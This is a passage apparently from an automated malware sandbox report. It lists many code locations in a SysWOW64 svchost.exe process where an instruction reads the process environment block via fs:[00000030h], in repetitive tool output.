            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D437C mov eax, dword ptr fs:[00000030h]2_2_035D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C310 mov ecx, dword ptr fs:[00000030h]2_2_0352C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550310 mov ecx, dword ptr fs:[00000030h]2_2_03550310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]2_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]2_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]2_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h]2_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h]2_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EC3CD mov eax, dword ptr fs:[00000030h]2_2_035EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B63C0 mov eax, dword ptr fs:[00000030h]2_2_035B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]2_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]2_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]2_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035663FF mov eax, dword ptr fs:[00000030h]2_2_035663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]2_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]2_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]2_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]2_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]2_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]2_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355438F mov eax, dword ptr fs:[00000030h]2_2_0355438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355438F mov eax, dword ptr fs:[00000030h]2_2_0355438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A250 mov eax, dword ptr fs:[00000030h]2_2_0352A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536259 mov eax, dword ptr fs:[00000030h]2_2_03536259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B8243 mov eax, dword ptr fs:[00000030h]2_2_035B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B8243 mov ecx, dword ptr fs:[00000030h]2_2_035B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]2_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]2_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]2_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352826B mov eax, dword ptr fs:[00000030h]2_2_0352826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352823B mov eax, dword ptr fs:[00000030h]2_2_0352823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]2_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]2_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]2_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h]2_2_0356E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h]2_2_0356E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]2_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]2_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]2_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov ecx, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C156 mov eax, dword ptr fs:[00000030h]2_2_0352C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C8158 mov eax, dword ptr fs:[00000030h]2_2_035C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536154 mov eax, dword ptr fs:[00000030h]2_2_03536154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536154 mov eax, dword ptr fs:[00000030h]2_2_03536154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov ecx, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov ecx, dword ptr fs:[00000030h]2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F0115 mov eax, dword ptr fs:[00000030h]2_2_035F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560124 mov eax, dword ptr fs:[00000030h]2_2_03560124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036061E5 mov eax, dword ptr fs:[00000030h]2_2_036061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h]2_2_035F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h]2_2_035F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035601F8 mov eax, dword ptr fs:[00000030h]2_2_035601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]2_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]2_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]2_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03570185 mov eax, dword ptr fs:[00000030h]2_2_03570185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h]2_2_035EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h]2_2_035EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h]2_2_035D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h]2_2_035D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532050 mov eax, dword ptr fs:[00000030h]2_2_03532050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6050 mov eax, dword ptr fs:[00000030h]2_2_035B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355C073 mov eax, dword ptr fs:[00000030h]2_2_0355C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4000 mov ecx, dword ptr fs:[00000030h]2_2_035B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6030 mov eax, dword ptr fs:[00000030h]2_2_035C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A020 mov eax, dword ptr fs:[00000030h]2_2_0352A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C020 mov eax, dword ptr fs:[00000030h]2_2_0352C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B20DE mov eax, dword ptr fs:[00000030h]2_2_035B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C0F0 mov eax, dword ptr fs:[00000030h]2_2_0352C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035720F0 mov ecx, dword ptr fs:[00000030h]2_2_035720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0352A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035380E9 mov eax, dword ptr fs:[00000030h]2_2_035380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B60E0 mov eax, dword ptr fs:[00000030h]2_2_035B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353208A mov eax, dword ptr fs:[00000030h]2_2_0353208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F60B8 mov eax, dword ptr fs:[00000030h]2_2_035F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F60B8 mov ecx, dword ptr fs:[00000030h]2_2_035F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C80A8 mov eax, dword ptr fs:[00000030h]2_2_035C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530750 mov eax, dword ptr fs:[00000030h]2_2_03530750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE75D mov eax, dword ptr fs:[00000030h]2_2_035BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]2_2_03572750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]2_2_03572750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4755 mov eax, dword ptr fs:[00000030h]2_2_035B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356674D mov esi, dword ptr fs:[00000030h]2_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]2_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]2_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538770 mov eax, dword ptr fs:[00000030h]2_2_03538770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530710 mov eax, dword ptr fs:[00000030h]2_2_03530710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560710 mov eax, dword ptr fs:[00000030h]2_2_03560710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C700 mov eax, dword ptr fs:[00000030h]2_2_0356C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356273C mov eax, dword ptr fs:[00000030h]2_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356273C mov ecx, dword ptr fs:[00000030h]2_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356273C mov eax, dword ptr fs:[00000030h]2_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AC730 mov eax, dword ptr fs:[00000030h]2_2_035AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h]2_2_0356C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h]2_2_0356C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353C7C0 mov eax, dword ptr fs:[00000030h]2_2_0353C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B07C3 mov eax, dword ptr fs:[00000030h]2_2_035B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035347FB mov eax, dword ptr fs:[00000030h]2_2_035347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035347FB mov eax, dword ptr fs:[00000030h]2_2_035347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]2_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]2_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]2_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE7E1 mov eax, dword ptr fs:[00000030h]2_2_035BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D678E mov eax, dword ptr fs:[00000030h]2_2_035D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035307AF mov eax, dword ptr fs:[00000030h]2_2_035307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354C640 mov eax, dword ptr fs:[00000030h]2_2_0354C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03562674 mov eax, dword ptr fs:[00000030h]2_2_03562674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F866E mov eax, dword ptr fs:[00000030h]2_2_035F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F866E mov eax, dword ptr fs:[00000030h]2_2_035F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A660 mov eax, dword ptr fs:[00000030h]2_2_0356A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A660 mov eax, dword ptr fs:[00000030h]2_2_0356A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572619 mov eax, dword ptr fs:[00000030h]2_2_03572619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE609 mov eax, dword ptr fs:[00000030h]2_2_035AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E627 mov eax, dword ptr fs:[00000030h]2_2_0354E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03566620 mov eax, dword ptr fs:[00000030h]2_2_03566620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568620 mov eax, dword ptr fs:[00000030h]2_2_03568620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353262C mov eax, dword ptr fs:[00000030h]2_2_0353262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0356A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A6C7 mov eax, dword ptr fs:[00000030h]2_2_0356A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]2_2_035B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]2_2_035B06F1
